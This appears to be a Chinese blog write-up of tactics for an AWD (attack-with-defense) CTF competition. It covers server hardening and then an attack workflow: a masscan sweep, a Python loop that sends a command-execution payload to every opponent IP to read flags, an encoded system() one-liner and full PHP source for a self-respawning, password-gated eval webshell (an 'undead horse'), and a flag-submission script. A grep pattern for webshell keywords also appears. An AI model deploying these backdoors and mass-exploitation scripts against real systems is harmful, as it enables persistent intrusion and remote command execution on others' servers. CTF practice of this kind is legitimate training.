第一次参加线下AWD比赛,思路太窄,手忙脚乱,通过其他大佬开源的AWD平台以及比赛的PHP环境整理一下简单的思路。
GitHub AWD平台地址:https://github.com/m0xiaoxi/AWD_CTF_Platform
加固思路:
1、登录服务器SSH 修改密码:passwd 2、下载源码并备份(FileZilla—Sftp—询问密码方式) tar -czvf /tmp/html.tar.gz /var/www/html(压缩) cd /tmp tar -xzvf /tmp/html.tar.gz(解压) cp -R /tmp/var/www/html/. /var/www/html/ (复制) mysql dump -u root -p test(数据库名) > test.sql(备份数据库) mysql -u root -p test(数据库名) < test.sql (还原数据库) 3、快速查找命令:- 上WAF或日志记录(若waf在web目录下需要删除掉waf文件的include)
find /var/www/html -name "*.php"|xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"
- 快速查一下shell
find /var/www/html -name "*.php" |xargs egrep 'assert|eval|phpinfo\(\)|\(base64_decoolcode|shell_exec|passthru|file_put_contents\(\.\*\$|base64_decode\('3、Webshell查杀(D盾):删除木马后门。 4、代码审计(seay):存在漏洞的变量直接写死等。 5、抓流量:tcpdump tcp -t -s 0 and port 80 -w /tmp/target.cap -t : 不显示时间戳 -s 0 : 抓取数据包时默认抓取长度为68字节。加上-S 0 后可以抓到完整的数据包
攻击思路:
1、扫描攻击目标:sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml 2、解析scan.xml到IP.txt1 import re 2 3 ipaddr_re = "((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)" 4 ip_re = "addr=.*addrtype=" 5 port_re = "portid=.*><state" 6 portnum_re = "[1-9]\d*" 7 8 def readxml(path): 9 with open(path, "r") as f: 10 list = [] 11 for line in f.readlines(): 12 line = line.strip('\n') #去掉列表中每一个元素的换行符 13 if "addr=" in line: 14 ip = re.search(ip_re, line).group() 15 ip = re.search(ipaddr_re, ip).group() 16 port = re.search(port_re, line).group() 17 port = re.search(portnum_re, port).group() 18 list.append([ip, port]) 19 return list 20 21 def writetxt(list): 22 with open("ip.txt", "w") as f: 23 for i in list: 24 ip_port = i[0] + ":" + i[1] +"\n" 25 f.write(ip_port) 26 27 def main(): 28 list = readxml("scan.xml") 29 writetxt(list) 30 31 if __name__ == '__main__': 32 main()View Code
3、burp抓取payload后批量攻击:
Burp插件copy as python-requests Burp报文转换为Python requests库格式: 输出示例:1 import requests 2 3 burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);" 4 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"} 5 burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} 6 requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)批量访问脚本,response写入result.txt中(由于写入不死马链接不会中断,无法访问下一个IP,建议加上timeout):
1 import requests 2 import re 3 import time 4 5 def IP(IP_path): 6 IP_list = [] 7 with open(IP_path, "r") as f: 8 for line in f.readlines(): 9 line = line.strip('\n') #去掉列表中每一个元素的换行符 10 IP_list.append(line) 11 return IP_list 12 13 def attack(IP_list): 14 result_list = [] 15 16 '''下面参数需要根据实际情况进行替换''' 17 burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian" 18 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"} 19 burp0_headers = {"Upgrade-Insecure-Requests": "1", 20 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", 21 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 22 "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} 23 burp0_data = {"cmd": "system(\"cat ../../../../flag\");"} 24 25 url = burp0_url.split("/") 26 for ip in IP_list: 27 url[2] = ip 28 burp0_url = "/".join(url) 29 print(burp0_url) 30 try: 31 '''下面语句需要根据实际情况进行替换,建议加上timeout''' 32 r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5) 33 34 if r.status_code == 200: 35 result_list.append(ip + "\n") 36 result_list.append(r.text + "\n") 37 print(r.text) 38 except requests.exceptions.Timeout: 39 continue 40 return result_list 41 42 def write(result_list): 43 with open("result.txt", "w") as f: 44 for line in result_list: 45 f.write(line) 46 47 def main(): 48 IP_list = IP("IP.txt") 49 result_list = attack(IP_list) 50 write(result_list) 51 52 if __name__ == '__main__': 53 main()View Code 4、通过默认后门批量种不死马:
命令执行写入不死马: GET方式需要转换为url编码:
cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B明文:
system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');5、通过上传漏洞批量种不死马: 不死马.php:
1 <?php 2 ignore_user_abort(true); 3 set_time_limit(0); 4 unlink(__FILE__); 5 $file = '.config.php'; 6 $code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>'; 7 while (1){ 8 file_put_contents($file,$code); 9 usleep(5000); 10 } 11 ?> 12 13 //.config.php?passwd=FPXtian&cmd=system("ls");6、通过不死马批量获取flag: 构造获取flag payload,使用插件copy as python-requests生成requests库的参数,替换至批量访问脚本中批量访问 7、批量提交flag:
1 import requests 2 import re 3 import time 4 5 # flag_re = "flag(.*)" 6 flag_re = ".{32}" 7 8 def flag(flag_path): 9 flag_list = [] 10 with open(flag_path, "r") as f: 11 for line in f.readlines(): 12 line = line.strip('\n') #去掉列表中每一个元素的换行符 13 if re.search(flag_re, line): 14 flag = re.search(flag_re, line).group() 15 flag_list.append(flag) 16 return flag_list 17 18 def submit(flag_list): 19 for flag in flag_list: 20 21 '''下面参数需要根据实际情况进行替换''' 22 burp0_url = "http://192.168.0.103:9090" 23 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"} 24 burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", 25 "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded", 26 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", 27 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 28 "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate", 29 "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} 30 burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"} 31 32 try: 33 '''下面语句需要根据实际情况进行替换,建议加上timeout''' 34 r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5) 35 if r.status_code == 200: 36 print(flag, r.text) 37 except requests.exceptions.Timeout: 38 continue 39 40 def main(): 41 flag_list = flag("result.txt") 42 submit(flag_list) 43 44 if __name__ == '__main__': 45 main()View Code
后续防御与攻击思路:
1、分析流量:修复漏洞,或者直接通过其他队伍的攻击流量进行批量反打。 2、杀不死马:1 while true 2 do 3 rm -f .config.php 4 done